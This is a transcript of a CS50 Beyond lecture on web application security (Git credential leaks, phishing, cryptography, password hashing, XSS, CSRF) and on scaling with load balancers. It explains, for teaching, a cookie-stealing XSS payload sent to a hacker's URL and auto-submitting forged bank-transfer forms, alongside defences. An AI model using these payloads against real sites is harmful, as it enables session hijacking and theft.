Placeholder Image

Subtitles section Play video

  • [MUSIC PLAYING]

  • BRIAN YU: OK, let's get started.

  • Welcome, everyone, to the final day of CS50 Beyond.

  • And goal for today is going to be to take a look at things

  • at a bit of a higher level.

  • There is going to be less code in today's lecture.

  • The focus of today is on two main topics--

  • security and scalability-- which are both important as you

  • begin to think about, you're writing all this code for your web application.

  • You're ready to deploy it so that people can actually use it.

  • What are the sorts of considerations you need to bear in mind?

  • What are the security considerations in making

  • sure that wherever you're hosting the application, you and the application

  • itself is secure and that your users are secure from potential vulnerabilities

  • or potential threats?

  • And also, from a scalability perspective,

  • we've been designing applications that so far probably only you

  • or a couple other people have been using.

  • But what sorts of things do you need to think about

  • as your applications begin to scale, as more and more people begin to use it,

  • and you have to begin to think about this idea of multiple people trying

  • to use the same application at the same time?

  • So a number of different considerations come about there.

  • We'll show a couple of code examples.

  • But the main idea of this is going to be high level, just thinking abstractly,

  • sort of trying to design the product, trying to design the project,

  • trying to figure out how exactly we need to be adjusting our application

  • to make sure that it's secure and to make sure that it's scalable.

  • So we'll go ahead and start with security.

  • And on the topic of security, we're going

  • to look at a number of different security considerations

  • as we move all throughout the week, from the beginning of the week

  • until the end of the week, thinking about the types of security

  • implications that come about.

  • And so one of the first things we introduced in the class was Git,

  • the version control tool that we were using

  • to keep track of different versions of our code

  • in order to manage different branches of our code, so on and so forth.

  • And so a couple of important security considerations to be aware with

  • regards to Git.

  • You all probably created GitHub repositories

  • over the course of this week, maybe for the first time.

  • And GitHub repositories by default are public.

  • And this is in the spirit of the idea of open source software, the idea

  • that anyone can see the code.

  • Anyone can contribute to the code.

  • And that, of course, comes with its trade offs.

  • On one hand, everyone being able to see the code certainly

  • means that anyone can help you to find bugs and identify bugs.

  • But it also means that anyone on the internet can see the code,

  • look for potential vulnerabilities, and then

  • potentially take advantage of those vulnerabilities.

  • So definitely, trade offs, costs, and benefits that

  • come along with open source software.

  • And another thing just to be aware of, we mentioned this earlier in the week,

  • but your Git commit history is going to store the entire history of any

  • of the commits that you have made, as the name might imply.

  • And so if you make a commit and you do something

  • you shouldn't have done, for instance-- you make a commit that accidentally

  • includes database credentials inside of the commit somewhere

  • or includes a password inside of the commit

  • somewhere-- you can later on remove those credentials

  • and make another commit and remove the credentials.

  • But the credentials are still there inside of the history.

  • If you go back, you could still find the credentials

  • if you had access to the entire Git repository

  • and could go back and find that point in Git's history.

  • So what are the potential solutions for if you do something like this,

  • accidentally expose credentials at some point in the repository

  • and then remove them?

  • What could you do?

  • Yeah?

  • AUDIENCE: Change the credentials.

  • BRIAN YU: Certainly.

  • Changing the credentials, something you should almost definitely do.

  • Change the password.

  • It's not enough just to remove them and make another commit.

  • And there's also something you can do known as Git purge, where

  • you can effectively purge the history of commit, sort of overwrite history,

  • so to speak, in order to replace that, as well.

  • But even that, if it's been online on GitHub,

  • who knows who may have been able to access the credentials?

  • So definitely always a good idea to remove those, as well.

  • On the first day, we also took a look at HTML.

  • We were designing basic HTML pages.

  • And there are a number of security vulnerabilities

  • you could create just with HTML alone.

  • Perhaps one of the most basic is just the idea that the contents of a link

  • can differ from where the link takes you to.

  • There's probably a pretty obvious point where you often

  • have text that links you to a particular page.

  • But this can often be misleading and is commonly

  • used in phishing email attacks, for instance,

  • whereby you have a link that takes you to URL one,

  • but by default, it shows you URL two, which can be misleading, for sure.

  • Or I can have situations where I could--

  • let's go into link.html--

  • I have a link that presumably takes me to google.com.

  • But if I click on google.com, it could take me anywhere else--

  • to some other site, for instance.

  • And the way that it does that is quite simply by just

  • having a link that takes you to a URL, but the contents of that URL

  • are something different or something else entirely.

  • And so that alone is something to be aware of.

  • But that problem is compounded when you consider the idea

  • that even though your server-side code-- application code

  • you write in Python and Flask, for instance--

  • you can keep secret from your users, HTML code is not

  • kept secret from users.

  • Any users can see HTML and do whatever they want with it.

  • And so on the first day, you may have been

  • trying to take a look at an HTML page and try and replicate it

  • using your own HTML and CSS, for example.

  • The simplest way to do something like that

  • would just be to copy the source code.

  • So I could go to bankofamerica.com, for instance, Control-Click on the page,

  • view the page source, and all right.

  • Here's all the HTML on Bank of America's home page.

  • I could copy that, create a new file, and call it bank.html.

  • Paste the contents of it in here.

  • Go ahead and save that.

  • And now, open up bank.html.

  • And now, I've got a page that basically looks like Bank of America's website.

  • And now, I could go in.

  • I could modify the links, change where Sign In takes you to,

  • make it take you to somewhere else entirely.

  • And so these are potential threats, vulnerabilities,

  • to be aware of on the internet that are quite easy to actually do.

  • So this is less about when you're designing your own web applications

  • but, when you're using web applications, the types of security

  • concerns to definitely be aware of.

  • So let's keep moving forward in the week-- yeah, question?

  • AUDIENCE: Can you copy JavaScript source code in the same way?

  • BRIAN YU: Yes.

  • Any JavaScript code that is on the client, you can access

  • and you can modify.

  • You can change variables and so on and so forth.

  • And this is actually a pretty easy thing to do.

  • So if I go to like, I don't know, The New York Times website, for instance,

  • and I look at the source code there--

  • let me go ahead and inspect the element, and I'll

  • try and hover over a main headline.

  • OK.

  • This is the name of a CSS class.

  • You could access any JavaScript.

  • You can also run any JavaScript in the console arbitrarily.

  • So I could say, all right, document.query selector all let's

  • get everything with that CSS class.

  • Or maybe it's just the first one, because it's two CSS classes.

  • All right.

  • Great.

  • I'll take the first one, set its inner HTML to be,

  • like, welcome to CS50 Beyond.

  • And you can play around with websites in order to mess around, change them.

  • So all of the JavaScript CSS classes, all of that,

  • is accessible to anyone who is using the page, for example.

  • Other questions before I go on?

  • Yeah.

  • AUDIENCE: Any thoughts on JavaScript obfuscation?

  • BRIAN YU: JavaScript obfuscation-- certainly something you can do.

  • So since JavaScript is available to anyone who has access to the web page,

  • there are programs called JavaScript obfuscators gators

  • that basically take plain old looking JavaScript

  • and convert it into something that's still JavaScript

  • but that's very difficult for any human to decipher.

  • It changes variable names and does a bunch of tricks in JavaScript

  • to still execute the exact same way but that looks quite obscure.

  • Definitely something you can do.

  • Still not totally foolproof, because there are ways

  • of trying to deobfuscate JavaScript code, at least to some extent.

  • So it's not perfect, but definitely something that you can do.

  • Other things?

  • All right.

  • Let's take a look at--

  • OK, when we were writing Flask applications,

  • we were writing web servers.

  • And so one thing that's just good to know from a security perspective

  • is the difference between HTTP, the Hypertext Transfer Protocol,

  • and the secure version of it, HTTPS.

  • And that has to do with the idea that on the internet,

  • we have computer servers that are trying to communicate

  • with each other that are trying to send information back and forth.

  • And when these computers are trying to send information back and forth,

  • we would like for that to happen securely,

  • that when one computer is sending information to another computer,

  • that information is going through a number of different routers.

  • And each of those routers could hypothetically

  • have information that's intercepted.

  • Someone could try and intercept a package on its way from computer number

  • one to computer number two.

  • So how do we securely try and transfer information from one location

  • to the other?

  • And this has to do with the entire field of cryptography,

  • which is a huge field that we're only going to be

  • able to barely scratch the surface of.

  • But the basic idea here is that we would like some way

  • to encrypt our information, that if I have some plain text that I would like

  • to send from my computer to someone else's computer,

  • I would like to encrypt that plain text, send it across in some encrypted way,

  • such that the person on the other end could decrypt it.

  • And so this is perhaps a more sophisticated version

  • of what you might have done in CS50's problem set two

  • when you were using the Caesar or the Vigenere cipher

  • in order to encrypt something.

  • The ciphers that are used in computing on the internet, for instance,

  • are just much more secure, for example.

  • But they follow a similar principle.

  • And so one form of cryptography is called secret-key cryptography,

  • where the idea is that if I am a computer up here

  • and I have some plain text that I want to encrypt,

  • I also have some key that only I know.

  • And I can take the plain text, and I can take that key

  • and run an algorithm on it.

  • And that generates some ciphertext, some encrypted version of the plain text

  • that was encrypted using the key.

  • I can then send that ciphertext along to the other person.

  • And so long as the other person has both the ciphertext and the key

  • to encrypt it, they can do the same process

  • and just decrypt it, generating the plain text from it.

  • That way, the ciphertext is transferred, not the plain text,

  • from one side to the other side of this communication.

  • And so long as both parties in this instance have access to the same key,

  • they can encrypt and decrypt messages at will.

  • Why doesn't this quite work on the internet, though?

  • What is the problem with this model?

  • Yeah?

  • AUDIENCE: If you're sending the key as well as the ciphertext,

  • then it's just revealed as sending the plain text that you have one.

  • BRIAN YU: Exactly.

  • When we transfer the ciphertext across, the other person

  • also needs access to the key.

  • We need to transfer the key across the internet,

  • as well, to give it to the other person.

  • And so anyone who is intercepting the ciphertext

  • could also have intercepted the key and therefore could

  • have decrypted the information and gotten the plain text

  • as a result of it.

  • So this secret-key cryptography, ultimately, it

  • doesn't work in the context of the internet

  • if it needs to be the case that the key is just

  • transferred across the internet.

  • Now, you could try encrypting the key, for example.

  • But then whenever key you used to encrypt the key,

  • that also needs to be sent across the internet,

  • and you end up with this problem where you can never figure out a way in order

  • to make sure that information can be transferred securely.

  • So the solution to this lies in a different idea called public-key

  • cryptography, where the idea here is that instead of having one key,

  • we'll have two keys--

  • one called a public key, one called a private key.

  • And the idea here is that a public key is something you can share with anyone.

  • Doesn't matter who has it.

  • And a private key is a key that you keep to yourself

  • that you don't give to anyone, even the person that you're

  • trying to communicate with.

  • And because we have two keys, each key is going to serve a different purpose.

  • They're going to be mathematically related.

  • And take a theory of computing class if you

  • want to understand the exact mathematics behind this.

  • But the basic idea is that the public key can be used to encrypt messages,

  • and the private key can be used to decrypt messages that

  • were encrypted using the public key.

  • And so what does this model look like?

  • Well, I have some public and private key.

  • And if I want some other person to send me information,

  • I will give them my public key.

  • Just give the other person the public key so that they have access to it.

  • Remember, the public key is used to encrypt data.

  • So they can use the public key and encrypt the plain text,

  • generate some ciphertext.

  • And then all the other person needs to do is send me that ciphertext.

  • The ciphertext comes across to me.

  • And I now have the private key, the key that I

  • can use to decrypt the information.

  • And using the private key and the ciphertext,

  • I can then decrypt the message and generate the plain text.

  • So this is the basic idea of public-key cryptography,

  • this idea that we use a public key to encrypt information and a private key

  • to decrypt information.

  • And by separating this out into two different keys,

  • we can share the public key freely without needing

  • to worry about the potential for internet traffic

  • to be intercepted and decrypted, for example.

  • And so this is the basis on which internet security works.

  • Yeah?

  • AUDIENCE: What if someone else intercepts the ciphertext

  • and they also have a private key?

  • Would they be able to decrypt it?

  • BRIAN YU: If someone else intercepts the ciphertext and they have a private key,

  • they won't be able to decrypt it, because the private key

  • and the public key are mathematically related in such a way

  • that if you encrypt something with a public key,

  • you can only decrypt it with the corresponding private key.

  • And so generally speaking, you'll generate both the public

  • and the private key at the same time, such that only messages encrypted

  • with one can be decrypted with the other.

  • So you can't just have some other random private key and decrypt the message.

  • It can only decrypt messages from the public key.

  • AUDIENCE: So how did this person get that specific [INAUDIBLE]??

  • BRIAN YU: So this person down here generated both the public

  • and the private key at the same time.

  • There's just an algorithm that you can use to randomly generate

  • a public and private key.

  • You share the public key with anyone you want to be able to send you messages.

  • That person you share it with can use the public key to encrypt the message.

  • And then you, the person who generated these keys,

  • can take the encrypted message, use the private key that you generated,

  • and get the plain text out of that.

  • Yeah?

  • AUDIENCE: How difficult is it to get the private key from the public key?

  • Is it impossible?

  • BRIAN YU: How difficult is it to get the private key from the public key?

  • Long story short, we don't really know.

  • We think it is very difficult to do.

  • We think that it would take a very long time.

  • If you took a computer and tried to get it to go from the public key

  • to the private key, we think it would probably take billions, trillions, more

  • years if a computer was operating at top speed trying to do this calculation.

  • But no one has been able to technically prove that it is difficult.

  • And so this is a big open question in computing right now.

  • You can take a theory of computation class

  • for more information on this sort of thing.

  • But there are some open unsolved problems in computing,

  • and this happens to be one of them.

  • Yeah?

  • AUDIENCE: Is it based on primes and very large primes, and you

  • multiply them together?

  • BRIAN YU: Yes, this is basically the idea of very large prime numbers

  • that you multiply together.

  • The long story short of it is it's based on the idea

  • that there is some mathematical operations that are easy

  • and some mathematical operations that are believed to be difficult.

  • And if you take two very big prime numbers,

  • a computer can multiply those numbers very easily

  • and calculate what the product of those two numbers is.

  • It's just a simple multiplication algorithm.

  • But if you have that result, that big multiplied prime number,

  • it's very difficult to factor that number

  • and figure out which two prime numbers were multiplied together

  • in order to generate that number.

  • And nobody has been able to come up with an efficient algorithm for factoring

  • it.

  • And so as a result, because we believe factoring numbers to be

  • a very difficult problem, we use it as the basis

  • for computing security on the internet.

  • Brief teaser of theory of computation.

  • Take any of the 120 series here at Harvard, at least,

  • for more information about that.

  • Other things?

  • Some other security considerations when designing web applications

  • to be aware of-- we mentioned this before,

  • but when it comes to storing credentials,

  • you should generally always store credentials

  • in environment variables inside of your application

  • rather than have inside of your Python code some password,

  • whether it's the secret key of your application,

  • whether it's the credentials to your database,

  • whether it's some other credentials for an API key,

  • for example, that you're using the server to access.

  • Usually best not to put that in the code in case someone else

  • gets access to the code.

  • Generally best to put it in an environment

  • variable, a variable that's just stored in the command line environment

  • where your server's being run from.

  • And then add code that just pulls the credentials from the environment.

  • You can use in Python, at least, os.environ.get

  • to mean get some information from the application's environment.

  • And this is generally going to be a more secure way of doing the same thing.

  • Yeah?

  • AUDIENCE: How do we do that in Heroku if we

  • want to upload our code to the website?

  • BRIAN YU: Yeah.

  • So if you're uploading this to Heroku, if you go to your Heroku application

  • and go to the Settings panel, there is a section,

  • I think it's called config vars, that basically just lets you add environment

  • variables to the Heroku application.

  • And that will automatically set those environment variables such

  • that when you run the application, it can

  • draw from those environment variables.

  • Yeah?

  • AUDIENCE: Is it [INAUDIBLE] yesterday, or is that something

  • you can't have access to?

  • Because if you just did [INAUDIBLE] and then the key,

  • it goes away when you close the terminal, correct?

  • BRIAN YU: Yes.

  • So that's true.

  • So you can certainly, on your own computer,

  • set aliases or environment variables inside

  • of your profile that automatically set credentials in a particular way.

  • The idea is that you never want to be taking those credentials

  • and committing them to a repository that other people might

  • be able to see, for instance.

  • That's where things start to get less secure.

  • OK.

  • Moving on in the week to talk about some other security considerations.

  • We'll talk about SQL, the idea of databases.

  • And when we introduce databases, there are a lot of security considerations

  • that come about.

  • But we'll just touch on a couple of them.

  • The first is how you store passwords.

  • So you can imagine that inside of a database,

  • you might be storing users and passwords together.

  • And maybe we have a whole users table that has an ID column,

  • a column for people's usernames, and a column for people's passwords.

  • And you could imagine just storing passwords inside of the row.

  • But why is this not particularly secure?

  • Yeah?

  • AUDIENCE: If anyone gets access to the data table,

  • they can see what all the passwords are.

  • BRIAN YU: Exactly.

  • If anyone gets access to the database, they immediately

  • have access to all of the passwords.

  • And this is probably not a secure way to go about things,

  • because you probably hear in the news from time

  • to time that databases aren't perfectly secure, that every once in a while,

  • there's some big security vulnerability where someone's able to get access

  • to passwords inside of a database.

  • And that becomes a major security concern.

  • And so one way to try and mitigate this problem

  • is, instead of storing passwords inside of the database,

  • store a hashed version of the password.

  • A hash function, as you might recall from CS50, just takes some input

  • and returns some deterministic output.

  • And a hash function can generally take any input password

  • and turn it into what looks like a whole bunch of random sequences of letters

  • and numbers.

  • And the idea here is that it's deterministic.

  • The same password will always result in the same hash value

  • whereby when someone tries to log in, when they type in their password,

  • rather than just literally compare their password

  • and say does the password match up with the password in this column,

  • you can say, all right, let's hash the password first.

  • And if the hashes match up, then with very high probability,

  • the user actually signed in to the website with the correct password.

  • And you can then log the user in.

  • And now, if someone was able to get access to the database,

  • they wouldn't get access to all the passwords.

  • They would only get access to the password hashes.

  • Now, it's still a security vulnerability,

  • because someone could, in theory, be able to figure out

  • information about the password from the password hashes.

  • But better, certainly, than literally storing the raw text

  • of the password in the database.

  • Yeah?

  • AUDIENCE: Do we know how the hash functions generate that code?

  • BRIAN YU: Yeah.

  • The hash functions tend to be deterministic,

  • and you look up what the hash functions themselves are.

  • So there are a couple of quite popular hash functions

  • that are out there that do this sort of thing.

  • But the idea of the hash function is similar to the idea

  • of public and private keys, that it's very easy to hash something,

  • and it's very difficult to go in the other direction.

  • I can easily hash a password and generate

  • something that looks like this.

  • But it's a difficult operation to take something that looks like this

  • and go backwards and figure out what it was that the original password was.

  • And so that's one of the properties of a good hash function.

  • Yes?

  • AUDIENCE: Did you actually hash these, or did you just hit the keyboard?

  • BRIAN YU: I think these are probably--

  • there might be hidden messages here if you look carefully.

  • But separate issue.

  • Other things?

  • OK.

  • So how is it that potential data is leaked as a result of using a database?

  • Well, there are a number of ways that applications can inadvertently

  • leak information.

  • Take a simple example.

  • Oftentimes, you'll see websites that have a Forgot Your Password

  • screen where you type in an email address, and you click Reset Password.

  • And that helps you to send you an email that allows you

  • to reset your password, for example.

  • And you imagine that you type in an email address,

  • and you get, OK, password reset email has been sent.

  • But maybe some applications work such that if you type

  • in an email address that doesn't exist, then

  • you get an error that says, OK, error.

  • There is no user with that email address.

  • What data has this application now exposed?

  • What information can you get just by using this part of a web application,

  • for instance?

  • Yeah?

  • AUDIENCE: You know that that email address is not in the system,

  • so you know that person is not using that app.

  • BRIAN YU: Yeah, exactly.

  • Just using the Forgot Password part of this application,

  • you can tell exactly who has an account for this application

  • and who doesn't just by typing email addresses and seeing what comes back.

  • So there's potential vulnerabilities in terms of data

  • that gets leaked there, as well.

  • And there are all sorts of different ways that information can get leaked.

  • Oftentimes, there's a growing field whereby

  • you can tell just based on the amount of time it takes for an HTTP request

  • to come back whether or not--

  • you can get information about the data inside of a database

  • based on that whereby if you make a request that takes a long time, that

  • can tell you something different than if a request comes back

  • very quickly, because that might mean fewer database requests

  • were required in order to make that particular operation work

  • or any number of different things.

  • And so there are security vulnerabilities there, as well.

  • Final one.

  • I'll briefly mention the SQL injection.

  • We've already talked about that.

  • But again, something to be aware of just to make sure

  • that whenever you're making database queries,

  • you're protecting yourself against SQL injection,

  • that you're making sure to either use a library that takes care of this for you

  • or escape any characters that you might be using that

  • could ultimately result in vulnerabilities in SQL.

  • Yeah?

  • AUDIENCE: How about the websites or tools

  • like LastPass that store your credentials for other sites?

  • Don't they have to have some way of reversing their own hash on it

  • in order to give you that credential when you go to another site?

  • So when it auto fills your username and password,

  • it has to-- if they're storing a hashed version on their side but filling

  • in the plain text version in the password field,

  • how are they able to reverse that in a way that is secure?

  • They would have to have a table of keys or something

  • that then is just as vulnerable as leaving the password.

  • BRIAN YU: Yeah.

  • So for password manager-type applications, it's a good question.

  • I think the way most of them do this is that you have a master password that

  • unlocks the entire database of the passwords that are stored there.

  • And the idea would be that they're encrypted

  • using the master password as the key to be the unlocker such

  • that they're encrypted.

  • And only by getting the master password correct

  • can you then decrypt the information and then

  • access the plain text version of the passwords that are inside.

  • And so hashing and encryption and decryption are slightly different.

  • In the case of encryption and decryption,

  • you still want to be able to go from the ciphertext back to the plain text,

  • whereas in the case of the password hashing,

  • you don't really care about the ability to reverse engineer it to go backwards.

  • All right.

  • And finally, on the topic of security, we'll

  • talk a little bit about JavaScript.

  • JavaScript opens a whole host of different potential vulnerabilities

  • from a security standpoint.

  • But we'll talk about a couple.

  • The first is this idea called cross-site scripting,

  • or the idea of taking a script and being effectively able to inject it

  • into some other site by putting some JavaScript that the web

  • application didn't intend into the web application itself.

  • And so here's a very simple web application written in Flask.

  • And this is the entire web application.

  • It's got a route, a default route, called / that just returns, "Hello,

  • world!"

  • And it's got an error handler that we didn't really see in the class.

  • But basically, it handles whenever there's

  • a 404 error, whenever you're trying to access a page that was not found.

  • And it just returns, "Not found," followed by request.path, whatever it

  • is that was the URL that you requested.

  • And so I could run this application.

  • I'll go ahead and start up Chrome, and I'll go ahead

  • and go to the source code for XSS1.

  • I'll run this application.

  • Go here.

  • It says, "Hello, world!"

  • And if I go to helloworld/foo, for example, some route that doesn't exist,

  • I get not found, /foo, because that's not a route that's available on this

  • page.

  • I go to /bar.

  • Not found, /bar.

  • What could go wrong here?

  • Where's the security vulnerability, again,

  • thinking in the context of JavaScript?

  • The page my application is returning is literally just "not found"

  • followed by whatever was typed into the request path.

  • And so what I could do is you could imagine that instead of running /foo,

  • I could instead make a request that looks something like /script

  • alert('hi) and then /script, for instance,

  • injecting some JavaScript into the request path whereby if I do that,

  • I say, OK, /script alert('hi') /script.

  • Press Return.

  • And OK, Chrome is being smart about this.

  • Chrome actually isn't allowing me to do this,

  • because Chrome has some more advanced features that are basically

  • saying Chrome detected unusual code on this page

  • and blocked it to protect your personal information and error blocked

  • by XSS auditor.

  • That's cross-site scripting.

  • So Chrome is automatically auditing for this.

  • But not all browsers are like that.

  • And I can, I think--

  • let's see if I can disable--

  • if I disable cross-site scripting protections,

  • I think I can get this to-- yeah, OK.

  • Disabling cross-site scripting productions,

  • we can still type in the URL and actually get some JavaScript

  • that the page didn't intend to still run on this particular web page.

  • And so if someone were to send you a link that took you to this page,

  • /script alert('hi'), you could get JavaScript to run that you

  • didn't intend.

  • And maybe that's not a big deal.

  • But it could be a bigger deal in a situation that

  • looks like this, where we have JavaScript

  • and document.write is a function that just add something to the page.

  • And here, we're loading an image, img src,

  • and the source is some hacker's website.

  • And then we say, cookie= and then document.cookie.

  • Document.cookie stores the cookie for this particular page.

  • And so effectively, what's happening in this script

  • is that your page, when you load it, is going to make a web

  • request to the hacker's URL.

  • And it's going to provide it as an argument whatever

  • the value of your cookie is, for instance.

  • And that cookie could be something that you use in order

  • to log in as the credentials for some website,

  • like a bank application or whatnot.

  • And as a result, the hacker now has access

  • to whatever the value of your cookie is, because they

  • can look at their list of all the requests

  • that have been made to the application much in the same way

  • that you've been able to do in the terminal

  • to see all the requests for your Flask application.

  • And they can see that someone requested hacker_url?cookie= this cookie,

  • and they can then use that cookie to be able to sign in to other sites,

  • as well.

  • So most modern browsers, like Chrome, are

  • pretty good at defending against this sort of thing.

  • But definitely something that is a potential vulnerability, especially

  • for older browsers.

  • Questions about this cross-site scripting?

  • Yeah?

  • AUDIENCE: Are you getting the user's cookie,

  • or whose cookie are you getting there?

  • BRIAN YU: Whoever opens the page.

  • So the user's cookie, potentially on an entirely different site.

  • The idea is that if your site is vulnerable to cross-site

  • scripting in this form, then you open up a possibility

  • where someone could generate a link to your website that

  • includes some JavaScript injected like this whereby someone else could

  • steal the cookies of your users on your website.

  • And they could get the cookies for themselves

  • and use those cookies to sign into your website

  • and pretend to be people that they're not, for example.

  • There's a potential security threat there.

  • So cross-site scripting is one example of a JavaScript vulnerability.

  • Another vulnerability is called cross-site request forgery.

  • Imagine that you have a bank website, for instance,

  • and that bank gives you a way to transfer money.

  • And if you go to that URL /transfer and then you provide arguments as to who

  • you're transferring money to and how much money you're transferring,

  • you can transfer money.

  • Might be a web request that allows you to do that.

  • Imagine some other website, some website where

  • hackers are trying to steal money, where they have code that

  • looks a little something like this.

  • They have a link that says, "Click Here!"

  • And when you click on the link, that takes you to yourbank.com/transfer

  • transferring to a particular person, transferring a particular amount.

  • And some unsuspecting user on this website could click the button.

  • And as a result, that takes them to their bank.

  • And if they happen to be logged into their bank at the time,

  • that could result in actually making that transfer.

  • So cross-site request forgery is the idea

  • that some other site can make a request on your site as by, in this case,

  • linking to it.

  • This still isn't an amazing threat, because the person actually still needs

  • to click on the button in order to be able to load in order to actually go

  • to yourbank.com/transfer/whatever.

  • But you can imagine that a clever hacker might be able to get around this

  • by doing something like this--

  • rendering an image, for example, and saying the source of the image

  • is going to be this.

  • And when an HTML sees an image tag, the browser is just going to go to that URL

  • and try and download that image.

  • It's going to go to the URL, try and fetch that resource.

  • And here, that resource is yourbank.com/transfer and then

  • transferring that money.

  • So the user doesn't even have to click on anything.

  • And by making a GET request to yourbank.com/transfer,

  • if yourbank.com isn't implemented particularly securely and just allows

  • you to go to a URL like this to transfer money, then that could be the result.

  • So how do you protect against this?

  • How would you protect against your website

  • being able to do something like this?

  • Because your website probably wants some way

  • of being able to transfer money if you have a bank application,

  • but you don't want to allow people to make requests like that.

  • Answer, yeah?

  • AUDIENCE: Yeah.

  • It's facetious.

  • BRIAN YU: Go for it.

  • AUDIENCE: You get a better bank.

  • BRIAN YU: Get a better bank.

  • OK.

  • Certainly something that would work.

  • Other thoughts?

  • Yeah?

  • AUDIENCE: Change the form request type so it's not literally in your own

  • [INAUDIBLE].

  • BRIAN YU: Yeah.

  • Change the form request type so that it's not literally here.

  • So this right here is a GET request.

  • You might imagine that instead, it's a form that's submitted by a POST,

  • like a POST request, a form that you actually

  • have to submit, click on a Submit button, in order to submit that form.

  • And so now, you could imagine that someone could still

  • create a vulnerability by doing something like this.

  • They have a form whose action is yourbank.com/transfer submitting

  • by a method POST.

  • And now, they have these input that are type hidden,

  • which are just input fields that don't show up inside of a page.

  • And they can have hidden input fields that

  • specify who it's to, what the amount is, and then just some button that says,

  • "Click Here!"

  • And if they click here, then unwittingly,

  • the user could be submitting a form to the bank that's

  • initiating some transfer.

  • And in fact, if the hacker is being particularly clever,

  • you don't even need the user to click anything,

  • because we can use event listeners to get around this.

  • I could say body onload--

  • in other words, when the body of the page is done loading,

  • run this JavaScript.

  • Document.forms returns an array of all the forms in the web document.

  • Square bracket 0 says get the first form.

  • And there's a function in JavaScript called .submit that submits a form.

  • So you can say, all right, get all the forms, get the first form,

  • and run submit.

  • And that's going to result in submitting this form,

  • making a POST request to yourbank.com/transfer,

  • which results in some amount being transferred.

  • So this is a potential vulnerability, as well.

  • If you're writing this bank application, you

  • don't want to allow a code like this to be able to get through your security,

  • because that opens up a whole host of potential security vulnerabilities.

  • And in general, the way that people tend to deal

  • with this is by adding what's called a CSRF token, a Cross-Site Request

  • Forgery token, basically adding some special value that changes

  • into their own forms and then, anytime someone submits

  • the form, checking to make sure the value of that token

  • is, in fact, a valid token.

  • And that way, someone couldn't fake it because some other form

  • on some other hacker's website isn't going to have a valid CSRF

  • token inside of their form page.

  • And so larger scale web application frameworks, like Django,

  • offer easy ways to add CSRF tokens to your forms, as well.

  • But just something to be aware of as you begin

  • to think about, when you're designing a web application,

  • how could someone exploit it?

  • How could someone make requests on behalf of users

  • that they don't intend to in order to get

  • some malicious result to come about?

  • So lots of security things to be thinking about.

  • Questions about security or any of the security topics

  • that we've covered or talked about?

  • Yeah?

  • AUDIENCE: [INAUDIBLE] the token is generated [INAUDIBLE] event,

  • or it's a unique token for every user?

  • BRIAN YU: Yeah.

  • Imagine that in the case of CS50 Finance,

  • for instance, that when I click on the Buy page that takes me

  • to the page where I can buy stocks, my route for buy

  • is going to basically generate a new token

  • and insert it into the form that then gets displayed to me.

  • And then when I submit that form, it gets submitted back

  • to the same application.

  • And the application can then check.

  • Did the token that came back match the token that I inserted into the page?

  • And if they do, in fact, match, then that's

  • a way of sort of verifying that the user was actually

  • submitting the actual form and not some fake form

  • that they were tricked into submitting.

  • All right.

  • In that case, let's switch gears a little bit,

  • and let's talk about scalability.

  • Here again, there's going to be even less code.

  • And the idea is just going to be, all right, what happens when

  • we begin to scale our web application?

  • We've got some web server, and we've got some users

  • that are using that web server, which we're going to represent as that line.

  • And so what happens when that server starts

  • to have more users that are all trying to use

  • the application at the same time?

  • What do we do?

  • Well, the first thing to probably do is figure out how many users

  • our website can actually support.

  • How many can it handle before it stops being able to support users?

  • And so this is where benchmarking is quite important.

  • Benchmarking is just this process by which we can test and sort of load test

  • our application to see what we can do to see how many users we could potentially

  • handle on our server.

  • And so what happens if we find out via benchmarking that,

  • OK, our server can only hold 100 users?

  • What if we need to support 101 users or 102 users?

  • What can we do?

  • One thing we can do is called vertical scaling, where the idea here

  • is, all right, we have a server.

  • And that server only supports 100 users.

  • All right, well, let's just get a bigger server, right?

  • Let's get a server that supports 200 users or 300 users.

  • And that's going to be able to better handle that load.

  • But there's a limit to this, right?

  • There's a limit to how much you can just increase the size of a server

  • and increase its ability to handle load.

  • And so what could you do to be able to handle more users?

  • AUDIENCE: More servers.

  • BRIAN YU: More servers.

  • Great.

  • And this is an idea called horizontal scaling, where

  • the idea is that we have some server.

  • And let's say, instead of having one server,

  • let's go ahead and have two servers that are running the exact same web

  • application.

  • And now, we have two servers that are able to run the application

  • and handle twice as many people.

  • What problems come about now, logistically?

  • User tries to access our website, and now what?

  • Yeah?

  • AUDIENCE: That means you could have a race condition situation

  • or how the servers communicate to each other [INAUDIBLE]..

  • BRIAN YU: Yeah.

  • How do the servers communicate with each other?

  • Certainly, race conditions become a threat, as well.

  • And then a fundamental problem is a user comes to the site,

  • and which server do they go to, right?

  • We need some way of deciding which server to direct a particular user to.

  • And so generally, this is solved by adding yet another piece of hardware

  • into the mix, adding some load balancer in between the user

  • and the servers whereby a user, when they request the page,

  • rather than going straight to the server, they go to the load balancer

  • first.

  • And from there on, the load balancer can split people up,

  • say certain people go to this server, certain people go to that server,

  • and try and decide how it is that people are going to be

  • divided into the different servers.

  • And so how could a load balancer decide?

  • If there are five servers and a user comes along,

  • how should a load balancer decide which server to send a user to?

  • There is no one right answer to this.

  • There are a number of possible options, a number of different

  • what are called load balancing methods.

  • But how could you decide where to send a user?

  • Yeah?

  • AUDIENCE: The server with the least amount of users currently.

  • BRIAN YU: Sure.

  • The server with the fewest users currently, what's often

  • called the fewest connections load balancing method.

  • You try and figure out which server has the fewest people on it.

  • And whichever one has the fewest people on it, send the user there.

  • Definitely good for trying to make sure that each one has about an equal load,

  • but potentially computationally expensive.

  • You're doing a lot of calculation now, so there's a trade off.

  • Yeah?

  • AUDIENCE: You could just do it randomly.

  • BRIAN YU: You could do it randomly.

  • You could just generate a random number between 1 and 5

  • and randomly assign someone to a particular server.

  • Definitely something you could do.

  • Other things?

  • Certainly the random approach is quick.

  • It doesn't involve having to do any calculation across all

  • the different servers.

  • But if you're unlucky, you could end up putting

  • a lot of people on server number two and not many people on server number eight

  • or whatnot.

  • And so what else could we do?

  • Yeah?

  • AUDIENCE: Just set up a counter [INAUDIBLE]..

  • BRIAN YU: Sure.

  • Some sort of counter.

  • If you only have two, you just alternate odd, even, odd, even.

  • Go to this server.

  • Go to that one.

  • If you've got eight, you just rotate amongst the eight--

  • 1, 2, 3, 4, 5, 6, 7, 8 and go back to 1.

  • And so these are probably three of the most common load balancing methods--

  • random choice, whereby you just pick a random server, direct the user there;

  • round robin, where we do exactly that, just basically go one up until the end

  • and then go back to server number one; and then fewest connections, whereby

  • you try and actually calculate which server currently

  • has the fewest number of people on it and then

  • try and direct the user to that one with the fewest connections.

  • There are other methods in addition to this,

  • but these are perhaps three of the most intuitive

  • where you can start to see their trade offs.

